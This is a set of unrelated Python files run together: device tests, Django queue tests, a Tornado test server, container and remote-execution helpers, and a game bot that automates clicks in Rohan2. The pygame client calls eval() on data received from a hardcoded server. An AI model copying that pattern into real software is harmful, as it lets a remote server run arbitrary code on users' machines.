if self.record:
self.writer.release()
self.recorderButton.running = False
if not self.headless:
cv2.destroyAllWindows()
sys.exit()
def update(self, exgMin=30, exgMax=180):
self.exgMin = exgMin
self.exgMax = exgMax
def check_for_usb():
try:
nanoMediaFolder = 'ls /media/pi'
proc = subprocess.Popen(nanoMediaFolder, shell=True, preexec_fn=os.setsid, stdout=subprocess.PIPE)
usbName = proc.stdout.readline().rstrip().decode('utf-8')
if len(usbName) > 0:
print('[INFO] Saving to {} usb'.format(usbName))
saveDir = '/media/pi/{}/'.format(usbName)
return saveDir, True
else:
print('[INFO] No USB connected. Saving to videos')
saveDir = '/home/pi/owl/videos'
return saveDir, False
except AttributeError:
print('[INFO] Windows computer detected...')
saveDir = '/videos/'
return saveDir, False
# business end of things
if __name__ == "__main__":
owl = Owl(video=False,
videoFile=r'',
headless=True,
recording=False,
exgMin=25,
exgMax=200,
hueMin=39,
hueMax=83,
saturationMin=50,
saturationMax=220,
brightnessMin=60,
brightnessMax=190,
framerate=32,
resolution=(416, 320))
# start the targeting!
owl.hoot(sprayDur=0.15,
sample=False,
sampleDim=1000,
saveDir='/home/pi',
algorithm='exhsv',
selectorEnabled=False,
camera_name='hsv',
minArea=10)
|
test_bulk.py
|
#! /usr/bin/env python3
import argparse
def parse_args():
parser = argparse.ArgumentParser(description='Talk to a ODrive board over USB bulk channel.')
return parser.parse_args()
if __name__ == '__main__':
# parse args before other imports
args = parse_args()
import sys
import time
import threading
from odrive import usbbulk
running = True
ready = False
def main(args):
global running
print("ODrive USB Bulk Communications")
print("---------------------------------------------------------------------")
print("USAGE:")
print("\tPOSITION_CONTROL:\n\t\tp MOTOR_NUMBER POSITION VELOCITY CURRENT")
print("\tVELOCITY_CONTROL:\n\t\tv MOTOR_NUMBER VELOCITY CURRENT")
print("\tCURRENT_CONTROL:\n\t\tc MOTOR_NUMBER CURRENT")
print("---------------------------------------------------------------------")
# query device
dev = usbbulk.poll_odrive_bulk_device(printer=print)
print (dev.info())
print (dev.init())
# thread
thread = threading.Thread(target=recieve_thread, args=[dev])
thread.start()
while running:
time.sleep(0.1)
try:
command = input("Enter ODrive command:\n")
dev.send(command)
except:
running = False
def recieve_thread(dev):
global ready
while running:
time.sleep(0.1)
try:
message = dev.recieve(dev.recieve_max())
message_ascii = bytes(message).decode('ascii')
print(message_ascii, end='')
if "ODrive Firmware" in message_ascii:
ready = True
except:
pass
if __name__ == "__main__":
main(args)
|
tests.py
|
import collections as co
import datetime as dt
import itertools
import random
import time
import pytest
from django.contrib.auth.models import User
from django.test import Client
import modelqueue as mq
from .models import Task
def nop(obj):
min_working = mq.Status.minimum(mq.State.working)
max_working = mq.Status.maximum(mq.State.working)
assert min_working <= obj.status <= max_working
@pytest.mark.django_db
def test_run_waiting_finished():
count = 10
for num in range(count):
task = Task(data=str(num))
task.save()
time.sleep(0.001)
waiting_kwargs = mq.Status.filter('status', mq.State.waiting)
waiting = Task.objects.filter(**waiting_kwargs)
assert waiting.count() == count
for num in range(count):
tasks = Task.objects.all()
task = mq.run(tasks, 'status', nop)
assert task.data == str(num)
assert mq.run(tasks, 'status', nop) is None
finished_kwargs = mq.Status.filter('status', mq.State.finished)
finished = Task.objects.filter(**finished_kwargs)
assert finished.count() == count
@pytest.mark.django_db
def test_run_created():
count = 10
for num in range(count):
task = Task(data=str(num), status=mq.Status.created())
task.save()
tasks = Task.objects.all()
assert tasks.count() == count
created_kwargs = mq.Status.filter('status', mq.State.created)
created = Task.objects.filter(**created_kwargs)
assert created.count() == count
assert mq.run(tasks, 'status', nop) is None
@pytest.mark.django_db
def test_run_working():
task1 = Task(data=str(0))
task1.save()
task2 = mq.run(Task.objects.all(), 'status', nop)
assert task1 == task2
assert mq.Status(task2.status).state == mq.State.finished
def always_fails(obj):
nop(obj)
raise RuntimeError
@pytest.mark.django_db
def test_run_canceled():
task = Task(data=str(0))
task.save()
for attempt in range(3):
try:
mq.run(Task.objects.all(), 'status', always_fails)
except RuntimeError:
pass
else:
assert False, 'runtime error expected'
task.refresh_from_db()
status = mq.Status(task.status)
assert status.state == mq.State.waiting
assert status.attempts == attempt + 1
try:
mq.run(Task.objects.all(), 'status', always_fails)
except RuntimeError:
pass
else:
assert False, 'runtime error expected'
task.refresh_from_db()
status = mq.Status(task.status)
assert status.state == mq.State.canceled
assert status.attempts == 4
def control_c(obj):
nop(obj)
raise KeyboardInterrupt
@pytest.mark.django_db
def test_run_canceled_no_retry():
task = Task(data=str(0))
task.save()
try:
mq.run(Task.objects.all(), 'status', control_c, retry=0)
except KeyboardInterrupt:
pass
else:
assert False, 'keyboard interrupt expected'
task.refresh_from_db()
status = mq.Status(task.status)
assert status.state == mq.State.canceled
assert status.attempts == 1
@pytest.mark.django_db
def test_run_timeout():
task = Task(data=str(0))
task.save()
state, priority, attempts = mq.Status(task.status).parse()
assert state == mq.State.waiting
priority -= dt.timedelta(hours=2)
assert attempts == 0
task.status = mq.Status.working(priority, 0)
task.save()
assert mq.run(Task.objects.all(), 'status', nop) == task
task.refresh_from_db()
status = mq.Status(task.status)
assert status.state == mq.State.finished
assert status.attempts == 2
@pytest.mark.django_db
def test_run_future():
future = mq.now() + mq.ONE_HOUR
task = Task(data=str(0), status=mq.Status.waiting(future))
task.save()
assert mq.run(Task.objects.all(), 'status', nop) is None
@pytest.mark.django_db
def test_run_timeout_delay():
past = mq.now() - mq.ONE_HOUR
task = Task(data=str(0), status=mq.Status.working(past))
task.save()
assert mq.run(Task.objects.all(), 'status', nop, delay=mq.ONE_HOUR) is None
task.refresh_from_db()
status = mq.Status(task.status)
assert status.state == mq.State.waiting
assert status.attempts == 1
assert mq.run(Task.objects.all(), 'status', nop) is None
@pytest.mark.django_db
def test_run_error_delay():
task = Task(data=str(0))
task.save()
tasks = Task.objects.all()
try:
mq.run(tasks, 'status', always_fails, delay=mq.ONE_HOUR)
except RuntimeError:
pass
else:
assert False, 'runtime error expected'
task.refresh_from_db()
status = mq.Status(task.status)
assert status.state == mq.State.waiting
assert status.attempts == 1
assert mq.run(Task.objects.all(), 'status', always_fails) is None
def maybe(obj):
nop(obj)
choice = random.randrange(3)
if choice == 0:
return
elif choice == 1:
raise RuntimeError
else:
assert choice == 2
# Simulate dying in the middle of a run. ModelQueue does not handle
# SystemExit events. The result is some tasks will be left in the
# working state.
raise SystemExit
def worker(counter):
tasks = Task.objects.all()
for num in range(10000):
if not random.randrange(3):
if random.randrange(100):
task = Task(data=str(next(counter)))
else:
status = mq.Status.created()
task = Task(data=str(next(counter)), status=status)
task.save()
else:
try:
one_millis = dt.timedelta(microseconds=1000)
ten_millis = one_millis * 10
mq.run(
tasks,
'status',
maybe,
timeout=ten_millis,
delay=one_millis,
)
except BaseException:
pass
from django.db import connection
connection.close()
@pytest.mark.django_db
def test_run_maybe():
tasks = Task.objects.all()
counter = itertools.count()
worker(counter)
# import threading
# threads = []
# for num in range(8):
# thread = threading.Thread(target=worker, args=(counter,))
# thread.start()
# threads.append(thread)
# for thread in threads:
# thread.join()
states = co.Counter()
attemptses = co.Counter()
for task in tasks:
status = mq.Status(task.status)
states[status.state] += 1
attemptses[status.attempts] += 1
print()
print('States:', sorted(states.most_common()))
print('Attempts:', sorted(attemptses.most_common()))
assert all(state in states for state in (1, 2, 4, 5))
assert all(attempts in attemptses for attempts in range(5))
def raise_retry(obj):
nop(obj)
raise mq.Retry(dt.timedelta(seconds=7))
@pytest.mark.django_db
def test_raise_retry():
task = Task(data=str(0))
task.save()
before_status = mq.Status(task.status)
task = mq.run(Task.objects.all(), 'status', raise_retry)
task.refresh_from_db()
after_status = mq.Status(task.status)
assert after_status.state == mq.State.waiting
assert after_status.priority >= before_status.priority
assert after_status.attempts == 0
def raise_abort(obj):
nop(obj)
raise mq.Abort(dt.timedelta(seconds=7))
@pytest.mark.django_db
def test_raise_abort():
task = Task(data=str(0))
task.save()
before_status = mq.Status(task.status)
task = mq.run(Task.objects.all(), 'status', raise_abort)
task.refresh_from_db()
after_status = mq.Status(task.status)
assert after_status.state == mq.State.waiting
assert after_status.priority >= before_status.priority
assert after_status.attempts == 1
def raise_cancel(obj):
nop(obj)
raise mq.Cancel
@pytest.mark.django_db
def test_raise_cancel():
task = Task(data=str(0))
task.save()
before_status = mq.Status(task.status)
task = mq.run(Task.objects.all(), 'status', raise_cancel)
task.refresh_from_db()
after_status = mq.Status(task.status)
assert after_status.state == mq.State.canceled
assert after_status.priority >= before_status.priority
assert after_status.attempts == 1
@pytest.mark.django_db
def test_tally():
result = {
'created': 1,
'waiting': 2,
'working': 3,
'finished': 4,
'canceled': 5,
}
for state in mq.Status.states:
for num in range(state):
func = getattr(mq.Status, str(state))
task = Task(data=str(int(state)), status=func())
task.save()
tasks = Task.objects.all()
assert mq.Status.tally(tasks, 'status') == result
@pytest.mark.django_db
def test_admin_list_filter():
user = User.objects.create(username='alice', password='password')
user.is_superuser = True
user.is_staff = True
user.save()
client = Client()
client.force_login(user)
for state in mq.Status.states:
for num in range(state * 2):
func = getattr(mq.Status, str(state))
task = Task(data=str(int(state)), status=func())
task.save()
response = client.get('/admin/www/task/')
assert b'30 tasks' in response.content
for state in mq.Status.states:
url = '/admin/www/task/?status_queue={name}'.format(name=state.name)
response = client.get(url)
assert '{} tasks'.format(state * 2).encode() in response.content
@pytest.mark.django_db
def test_admin_add():
user = User.objects.create(username='alice', password='password')
user.is_superuser = True
user.is_staff = True
user.save()
client = Client()
client.force_login(user)
response = client.get('/admin/www/task/add/')
assert b'value="220' in response.content
@pytest.mark.django_db
def test_admin_action_state():
user = User.objects.create(username='alice', password='password')
user.is_superuser = True
user.is_staff = True
user.save()
client = Client()
client.force_login(user)
for state in mq.Status.states:
func = getattr(mq.Status, str(state))
task = Task(data=str(int(state)), status=func())
task.save()
for state in mq.Status.states:
action = f'make_status_state_{state}'
args = {'action': action, '_selected_action': 1}
response = client.post('/admin/www/task/', args)
assert response.status_code == 302
@pytest.mark.django_db
def test_admin_action_priority():
user = User.objects.create(username='alice', password='password')
user.is_superuser = True
user.is_staff = True
user.save()
client = Client()
client.force_login(user)
for state in mq.Status.states:
func = getattr(mq.Status, str(state))
task = Task(data=str(int(state)), status=func())
task.save()
action = 'make_status_priority_now'
args = {'action': action, '_selected_action': 1}
response = client.post('/admin/www/task/', args)
assert response.status_code == 302
@pytest.mark.django_db
def test_admin_action_attempts():
user = User.objects.create(username='alice', password='password')
user.is_superuser = True
user.is_staff = True
user.save()
client = Client()
client.force_login(user)
for state in mq.Status.states:
func = getattr(mq.Status, str(state))
task = Task(data=str(int(state)), status=func())
task.save()
action = 'make_status_attempts_zero'
args = {'action': action, '_selected_action': 1}
response = client.post('/admin/www/task/', args)
assert response.status_code == 302
|
gameMapClient.py
|
import socket, threading
from pygame import *
from math import*
#TCP_IP = '10.88.214.97'
TCP_IP = '192.227.178.111'
TCP_PORT = 5005
BUFFER_SIZE = 200
running = True
screen = display.set_mode((800,600))
otherPlayers = {}
background = image.load('OutcastMap.png')
person = image.load("Default Person.png")
deg = 90
playerList = ['admin',[400,300],deg]
def getData():
global BUFFER_SIZE
global running
global playerList
global otherPlayers
global deg
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
while running:
s.send(str(playerList).encode('utf-8'))
data = eval(s.recv(BUFFER_SIZE).decode('utf-8'))
try:
otherPlayers = data
except:
pass
s.close()
threading.Thread(target=getData).start()
while running:
for e in event.get():
if e.type == QUIT:
running = False
#Movement and Blitting
try:
portion = background.subsurface(Rect(playerList[1][0]-screen.get_width()//2,playerList[1][1]-screen.get_height()//2,800,600))
screen.blit(portion,(0,0))
except:
print(playerList)
mx,my = mouse.get_pos()
mb = mouse.get_pressed()
keysPressed = key.get_pressed()
#UP
if keysPressed[K_w] and 300<playerList[1][1]-5:
playerList[1][1] -= 5
#DOWN
if keysPressed[K_s] and playerList[1][1]+5<background.get_height()-300:
playerList[1][1] += 5
#LEFT
if keysPressed[K_a] and 400<playerList[1][0]-5:
playerList[1][0] -= 5
#RIGHT
if keysPressed[K_d] and playerList[1][0]+5<background.get_width()-400:
playerList[1][0] += 5
length=(400-mx),(300-my)
deg = atan2(length[0],length[1])
length=degrees(deg)
rotated = transform.rotate(person,(length))
screen.blit(rotated,(screen.get_width()//2-rotated.get_width()//2,screen.get_height()//2-rotated.get_height()//2))
#draw.circle(screen, (255,255,0), playerList[1],5)
for p in otherPlayers:
if p != playerList[0]:
px,py = playerList[1]
nx,ny = otherPlayers[p][0]
if px-screen.get_width()//2<nx<px+screen.get_width() and py-screen.get_height()//2<ny<py+screen.get_height()//2:
nx = nx-px +400
ny = ny-py +300
rotated = transform.rotate(person,(length))
screen.blit(rotated,(nx-rotated.get_width()//2,ny-rotated.get_height()//2))
display.flip()
quit()
|
tornado-localserver.py
|
import re
import threading
import tornado.httpserver
import tornado.ioloop
import tornado.web
import time
from authhandler import BasicAuthHandler
from authhandler import DigestAuthHandler
RELOAD_TEST_HTML = """\
<html>
<head><title>Title</title></head>
<body>
<a href="/mechanize">near the start</a>
<p>Now some data to prevent HEAD parsing from reading the link near
the end.
<pre>
%s</pre>
<a href="/mechanize">near the end</a>
</body>
</html>""" % (("0123456789ABCDEF"*4+"\n")*61)
REFERER_TEST_HTML = """\
<html>
<head>
<title>mechanize Referer (sic) test page</title>
</head>
<body>
<p>This page exists to test the Referer functionality of <a href="/mechanize">mechanize</a>.
<p><a href="/cgi-bin/cookietest.cgi">Here</a> is a link to a page that displays the Referer header.
</body>
</html>"""
def html(title=None, extra_content=""):
html = """\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>mechanize</title>
</head>
<body><a href="http://sourceforge.net/">
%s</a>
</body>
</html>
""" % extra_content
if title is not None:
html = re.sub("<title>(.*)</title>", "<title>%s</title>" % title, html)
return html
class MainHandler(tornado.web.RequestHandler):
def get(self):
HTML = html('mechanize')
self.write(HTML)
class RobotHandler(tornado.web.RequestHandler):
def get(self, page):
self.set_header('Content-Type', 'text/plain')
if page == 'robots.txt':
self.write("User-Agent: *\nDisallow: /norobots")
elif page == 'robots':
self.write("Hello, robots.")
elif page == 'norobots':
self.write("Hello, non-robots.")
else:
self.write(page+": I don't understand!")
class MechanizeHandler(tornado.web.RequestHandler):
def get(self, page):
if page == '':
HTML = html()
elif page == 'example.html':
import os.path
HTML = open(os.path.join("..", "examples", "forms", "example.html")).read()
else:
HTML = 'Wrong!'
self.write(HTML)
class TestFixturesHandler(tornado.web.RequestHandler):
def get(self, page):
if page == '':
HTML = html("Python bits", extra_content="GeneralFAQ.html")
elif page == 'cctest2.txt':
self.set_header('Content-Type', 'text/plain')
HTML = "Hello ClientCookie functional test suite."
elif page == 'referertest.html':
HTML = REFERER_TEST_HTML
elif page == 'mechanize_reload_test.html':
HTML = RELOAD_TEST_HTML
else:
HTML = "Wrong!"
self.write(HTML)
class CGIHandler(tornado.web.RequestHandler):
# TODO(Samba): Move this code into Tornado Templates
# There's a time for intelligence, and that's later.
# ...I need a better motto.
def post(self, page):
if page == 'cookietest':
import os
import urllib.parse
from html import escape
from time import time, localtime
from xml.sax import saxutils
year_plus_one = localtime(time())[0] + 1
expires = "expires=09-Nov-%d 23:12:40 GMT" % (year_plus_one,)
cookies = self.cookies
self.set_header("Content-Type", "text/html")
self.add_header("Set-Cookie", "foo=bar; {}".format(expires))
self.add_header("Set-Cookie", "sessioncookie=spam")
HTML = """\
<html><head><title>Cookies and form submission parameters</title>
"""
refresh_value = self.get_argument("refresh")
if refresh_value:
HTML += '<meta http-equiv="refresh" content=%s>' % (
saxutils.quoteattr(urllib.parse.unquote_plus(refresh_value)))
elif "foo" not in cookies:
HTML += '<meta http-equiv="refresh" content="5">'
HTML += """</head>
<p>Received cookies:</p>
<pre>
"""
HTML += ', '.join(c for c in cookies)
HTML += "\n</pre>\n"
if "foo" in cookies:
HTML += "<p>Your browser supports cookies!</p>\n"
if "sessioncookie" in cookies:
HTML += "<p>Received session cookie</p>\n"
HTML += """<p>Referer:</p>
<pre>
"""
HTML += self.request.get_header('Referer')
HTML += """\n</pre>
<p>Received parameters:</p>
<pre>
"""
form = {k: self.get_arguments(k) for k in self.request.arguments if self.get_arguments(k)}
for k in form:
v = form.get(k)
if isinstance(v, list):
vs = []
for item in v:
vs.append(item)
text = ', '.join(vs)
elif not v:
text = "None"
else:
text = v
HTML += "%s: %s\n" % (escape(k), escape(text))
HTML += "</pre></html>"
elif page == 'echo':
from html import escape
self.set_header("Content-Type", "text/html")
HTML = "<html><head><title>Form submission parameters</title></head>\n"
form = {k: self.get_arguments(k) for k in self.request.arguments if self.get_arguments(k)}
HTML += "<p>Received parameters:</p>\n"
HTML += "<pre>\n"
for k in form:
v = form.get(k)
if isinstance(v, list):
vs = []
for item in v:
vs.append(item)
text = ', '.join(vs)
else:
text = v
HTML += "%s: %s\n" % (escape(k), text)
HTML += "</pre></html>"
else:
HTML = "Wrong!"
self.write(HTML)
def start_tornado(*args, **kwargs):
app = tornado.web.Application([
(r"/", MainHandler),
(r"/mechanize/?([\w.]*)", MechanizeHandler),
(r"/(.*robot.*)", RobotHandler),
(r"/test_fixtures/?([\w.]*)", TestFixturesHandler),
(r"/redirected", tornado.web.RedirectHandler, {"url": "/"}),
(r"/cgi-bin/(.*)\.cgi", CGIHandler),
(r"/basic_auth", BasicAuthHandler),
(r"/digest_auth", DigestAuthHandler)
])
http_server = tornado.httpserver.HTTPServer(app)
http_server.listen(8878)
print("Starting Tornado")
tornado.ioloop.IOLoop.instance().start()
print("Tornado finished")
def stop_tornado():
ioloop = tornado.ioloop.IOLoop.instance()
ioloop.add_callback(lambda x: x.stop(), ioloop)
print("Asked Tornado to exit")
def main():
t = threading.Thread(target=start_tornado)
t.start()
time.sleep(60)
stop_tornado()
t.join()
if __name__ == "__main__":
main()
|
monitors.py
|
"""
Common threading utils for anchore engine services.
"""
import time
import threading
from anchore_engine.subsys import logger
# generic monitor_func implementation
click = 0
running = False
last_run = 0
monitor_thread = None
def default_monitor_func(**kwargs):
"""
Generic monitor thread function for invoking tasks defined in a monitor dict
:param kwargs:
:return:
"""
global click, running, last_run
my_monitors = kwargs['monitors']
monitor_threads = kwargs['monitor_threads']
servicename = kwargs['servicename']
timer = int(time.time())
if click < 5:
click = click + 1
logger.debug("service ("+str(servicename)+") starting in: " + str(5 - click))
return (True)
if round(time.time() - last_run) < kwargs['kick_timer']:
logger.spew(
"timer hasn't kicked yet: " + str(round(time.time() - last_run)) + " : " + str(kwargs['kick_timer']))
return (True)
try:
running = True
last_run = time.time()
# handle setting the cycle timers based on configuration
for monitor_name in list(my_monitors.keys()):
if not my_monitors[monitor_name]['initialized']:
# first time
if 'cycle_timers' in kwargs and monitor_name in kwargs['cycle_timers']:
try:
the_cycle_timer = my_monitors[monitor_name]['cycle_timer']
min_cycle_timer = my_monitors[monitor_name]['min_cycle_timer']
max_cycle_timer = my_monitors[monitor_name]['max_cycle_timer']
config_cycle_timer = int(kwargs['cycle_timers'][monitor_name])
if config_cycle_timer < 0:
the_cycle_timer = abs(int(config_cycle_timer))
elif config_cycle_timer == 0:
my_monitors[monitor_name]['enabled'] = False
logger.debug("monitor '{}' has been explicitly disabled in config".format(monitor_name))
elif config_cycle_timer < min_cycle_timer:
logger.warn("configured cycle timer for handler ("+str(monitor_name)+") is less than the allowed min ("+str(min_cycle_timer)+") - using allowed min")
the_cycle_timer = min_cycle_timer
elif config_cycle_timer > max_cycle_timer:
logger.warn("configured cycle timer for handler ("+str(monitor_name)+") is greater than the allowed max ("+str(max_cycle_timer)+") - using allowed max")
the_cycle_timer = max_cycle_timer
else:
the_cycle_timer = config_cycle_timer
my_monitors[monitor_name]['cycle_timer'] = the_cycle_timer
except Exception as err:
logger.warn("exception setting custom cycle timer for handler ("+str(monitor_name)+") - using default")
my_monitors[monitor_name]['initialized'] = True
# handle the thread (re)starters here
for monitor_name in list(my_monitors.keys()):
if my_monitors[monitor_name].get('enabled', True):
start_thread = False
if monitor_name not in monitor_threads:
start_thread = True
else:
if not monitor_threads[monitor_name].isAlive():
logger.debug("thread stopped - restarting: " + str(monitor_name))
monitor_threads[monitor_name].join()
start_thread = True
if start_thread:
monitor_threads[monitor_name] = threading.Thread(target=my_monitors[monitor_name]['handler'], args=my_monitors[monitor_name]['args'], kwargs={'mythread': my_monitors[monitor_name]})
logger.debug("starting up monitor_thread: " + str(monitor_name))
monitor_threads[monitor_name].start()
except Exception as err:
logger.error(str(err))
finally:
running = False
return True
def monitor(*args, **kwargs):
global monitor_thread
try:
donew = False
if monitor_thread:
if monitor_thread.isAlive():
logger.spew("MON: thread still running")
else:
logger.spew("MON: thread stopped running")
donew = True
monitor_thread.join()
logger.spew("MON: thread joined: isAlive=" + str(monitor_thread.isAlive()))
else:
logger.spew("MON: no thread")
donew = True
if donew:
logger.spew("MON: starting")
monitor_thread = threading.Thread(target=default_monitor_func, kwargs=kwargs)
monitor_thread.start()
else:
logger.spew("MON: skipping")
except Exception as err:
logger.warn("MON thread start exception: " + str(err))
|
test_socket_transceiver.py
|
from collections import deque
from typing import Deque, Optional, Tuple, Union
from enum import Enum
import random
from threading import Thread
from time import sleep
from pisat.comm.transceiver import TransceiverBase
from pisat.comm.transceiver import SocketTransceiver
from pisat.comm.transceiver import CommSocket
class TestTransceiver(TransceiverBase):
class Setting(Enum):
BYTES_PACKET_MAX = 64
DATA = b"abcdefghijklmn"
ADDRESS = [1, 2, 3, 4, 5]
def __init__(self,
address: Tuple[int],
name: Optional[str] = None) -> None:
super().__init__(handler=None, address=address, name=name)
self._buf: Deque[bytes] = deque()
self._buf_send: Deque[bytes] = deque()
def update_data(self):
def update():
time = 0
while True:
self._buf.appendleft(self.DATA)
sleep(1)
time += 1
if time > 10:
break
print("end update_data")
thread = Thread(target=update)
thread.start()
def recv_raw(self) -> Tuple[Tuple[int], bytes]:
if len(self._buf) > 0:
addr = 1
# addr = random.choice(self.ADDRESS)
data = self._buf.pop()
return (addr, ), data
else:
return ()
def send_raw(self, address: Tuple[int], data: Union[bytes, bytearray]) -> None:
address_str = str(address[0])
self._buf_send.appendleft(address_str.encode() + bytes(data))
def main_1():
test_transceiver = TestTransceiver((0,))
sock_transceiver = SocketTransceiver(test_transceiver)
socket_1 = sock_transceiver.create_socket((1, ), name="socket_1")
socket_2 = sock_transceiver.create_socket((2, ), name="socket_2")
test_transceiver.update_data()
sock_transceiver.observe()
time = 0
while True:
socket_1.send(b'hello' * 20)
sleep(0.5)
time += 0.5
print(socket_1.recv(10))
if time > 11:
break
sock_transceiver.stop_observe()
print(test_transceiver._buf_send)
def main_2():
test_transceiver = TestTransceiver((0,))
sock_transceiver = SocketTransceiver(test_transceiver)
socket_1 = sock_transceiver.create_socket((1, ), name="socket_1")
socket_2 = sock_transceiver.create_socket((2, ), name="socket_2")
sock_transceiver.observe()
print("go")
socket_1.send(b"hello world " * 10)
socket_2.send(b"bye world " * 10)
sleep(0.01)
print(test_transceiver._buf_send)
for d in test_transceiver._buf_send:
print(len(d))
sock_transceiver.stop_observe()
if __name__ == "__main__":
main_2()
|
ShifterRunner.py
|
import os
from threading import Thread
from subprocess import Popen, PIPE
from select import select
class ShifterRunner:
"""
This class provides the container interface for Docker.
"""
def __init__(self, logger=None):
"""
Inputs: config dictionary, Job ID, and optional logger
"""
self.logger = logger
self.containers = []
self.threads = []
def _readio(self, p, job_id, queues):
cont = True
last = False
while cont:
rlist = [p.stdout, p.stderr]
x = select(rlist, [], [], 1)[0]
for f in x:
if f == p.stderr:
error = 1
else:
error = 0
l = f.readline().decode('utf-8')
if len(l) > 0:
try:
self.logger.log_lines([{'line': l, 'is_error': error}])
except Exception as e:
print(e)
continue
if last:
cont = False
if p.poll() is not None:
last = True
p.wait()
for q in queues:
q.put(['finished', job_id, None])
def get_image(self, image):
# Do a shifterimg images
lookcmd = ['myshifter', 'lookup', image]
proc = Popen(lookcmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
id = stdout.decode('utf-8').rsplit()
if id == [] or id is None:
cmd = ['myshifter', 'pull', image]
proc = Popen(cmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
proc = Popen(lookcmd, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
id = stdout.decode('utf-8').rsplit()
return id[0]
def run(self, job_id, image, env, vols, labels, queues, cgroup=None):
self.get_image(image)
cmd = [
'myshifter',
'run',
'--image=%s' % (image)
]
# TODO: Do somehting with the labels
for hd in vols.keys():
cmd.extend(['--volume', '%s:%s' % (hd, vols[hd]['bind'])])
newenv = os.environ
for e in env.keys():
newenv[e] = env[e]
proc = Popen(cmd, bufsize=0, stdout=PIPE, stderr=PIPE, env=newenv)
out = Thread(target=self._readio, args=[proc, job_id, queues])
self.threads.append(out)
out.start()
self.containers.append(proc)
return proc
def remove(self, c):
# Kill process
c.kill()
|
main.py
|
from cv2 import cv2
import os
from time import time, sleep
import pydirectinput, pyautogui, threading
from ekranyakala import ekranYakala
from vision import Vision
# from detection import Detection
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Pencere başlığı sürekli değiştiği için tüm başlıkları tek tek yazdım.
baslik = ("Rohan2 - İlk Günkü Tutku ile! | Discord : https://discord.gg/sGJhpvG",
"Rohan2 - Tüm Teçhizatlarını Son Seviyeye Getir! | Forum: https://board.rohan2.global",
"Rohan2 - Amansız Patronları Yen! | Wiki: https://wiki.rohan2.global",
"Rohan2 - Eğlenerek Zevkle Vakit Geçir! | https://rohan2.global",
"Rohan2 - Farkı Hisset! | Anasayfa: https://rohan2.global")
# Pencerenin başlığı eşleşene kadar dönüyor.
for i in baslik:
try:
wincap = ekranYakala(i)
except:
continue
# Model dosyası
cascade = cv2.CascadeClassifier("/cascade/cascade.xml")
vision = Vision(None)
loop_time = time()
metine_vur = False
s = 1
s1 = 0
kontrol = 0
def metinevur(rectangles):
global metine_vur
global kontrol
global s, s1
if len(rectangles) > 0:
targets = vision.get_click_points(rectangles)
target = wincap.get_screen_position(targets[0])
pyautogui.moveTo(x=target[0], y=target[1])
sleep(0.4)
pyautogui.click(x=target[0], y=target[1])
print(s,"Metin Bulundu")
s += 1
# Metin taşını kesme hızınıza(saniye) göre bekletin
sleep(17)
else:
s1 += 1
print(s1, "Bulunamadı")
"""
- Oyunda objeyi bulamazsa 6 defa 'e' tuşuna basar. yani ekranı döndürür.
'f' ile kamerayı genişletir.
- 3 defa bulamazsa 3 kez 'w'e basar ve ileri gider.
Yani kısacası burada yaptığımız işlem konum değiştirmek.
Oynadığınız servere göre değiştirip geliştirebilirsiniz.
Eğer oyun içinde tuş basmıyorsa programı yönetici olarak çalıştırıp deneyin.
Yine olmazsa yapacak bişey yok :) yada ben bulamadım...
"""
pydirectinput.press("e", presses=6)
pydirectinput.press("f", presses=10)
kontrol += 1
if kontrol >= 3:
print("Kontrol", kontrol)
pydirectinput.press("w", presses=3)
kontrol = 0
metine_vur = False
while True:
ss = wincap.get_screenshot()
rectangles = cascade.detectMultiScale(ss)
detection_image = vision.draw_rectangles(ss, rectangles)
cv2.imshow('Goruntu', detection_image)
if not metine_vur:
"""
True, False kullanmamızın sebebi,
Program sürekli döngüde kalacağı için,
sadece 'false' durumlarda bu koşula girmesini istiyoruz.
"""
metine_vur = True
thrd = threading.Thread(target=metinevur, args=(rectangles,))
thrd.start()
# FPS göster
# print("FPS {}".format(1 / (time() - loop_time)))
# loop_time = time()
# Döngüden çık
key = cv2.waitKey(1)
if key == ord("q"):
cv2.destroyAllWindows()
print("Döngüden Çıkıldı")
break
|
remote_execution.py
|
import os
import sys
import stat
import tempfile
import traceback
import subprocess
import dace.dtypes
from string import Template
from dace.codegen.compiler import generate_program_folder
from dace.config import Config
from dace.codegen.instrumentation.papi import PAPISettings, PAPIUtils
class Executor:
""" Remote DaCe program execution management class for DIODE. """
def __init__(self, perfplot, headless, sdfg_renderer, async_host=None):
self.counter = 0
self.perfplot = perfplot
self.headless = headless
self.exit_on_error = self.headless
self.rendered_graphs = sdfg_renderer
self.running_async = async_host is not None
self.async_host = async_host
self._config = None
self.output_generator = None
def setExitOnError(self, do_exit):
self.exit_on_error = do_exit
def setConfig(self, config):
self._config = config
def config_get(self, *key_hierarchy):
if self._config is None:
return Config.get(*key_hierarchy)
else:
return self._config.get(*key_hierarchy)
def run(self, dace_state, fail_on_nonzero=False):
dace_progname = dace_state.get_sdfg().name
code_objects = dace_state.get_generated_code()
# Figure out whether we should use MPI for launching
use_mpi = False
for code_object in code_objects:
if code_object.target.target_name == 'mpi':
use_mpi = True
break
# Check counter validity
PAPIUtils.check_performance_counters(self)
remote_workdir = self.config_get("execution", "general", "workdir")
remote_dace_dir = remote_workdir + "/.dacecache/%s/" % dace_progname
self.show_output("Executing DaCe program " + dace_progname + " on " + \
self.config_get("execution", "general", "host") + "\n")
try:
if self.running_async:
# Add information about what is being run
self.async_host.notify("Generating remote workspace")
tmpfolder = tempfile.mkdtemp()
generate_program_folder(
dace_state.get_sdfg(),
code_objects,
tmpfolder,
config=self._config)
self.create_remote_directory(remote_dace_dir)
self.copy_folder_to_remote(tmpfolder, remote_dace_dir)
if self.running_async:
# Add information about what is being run
self.async_host.notify("Compiling...")
# call compile.py on the remote node in the copied folder
self.remote_compile(remote_dace_dir, dace_progname)
if self.running_async:
# Add information about what is being run
self.async_host.notify("Done compiling")
# copy the input file and the .so file (with the right name)
# to remote_dace_dir
so_name = "lib" + dace_progname + "." + self.config_get(
'compiler', 'library_extension')
self.copy_file_from_remote(remote_dace_dir + "/build/" + so_name,
tmpfolder + "/" + so_name)
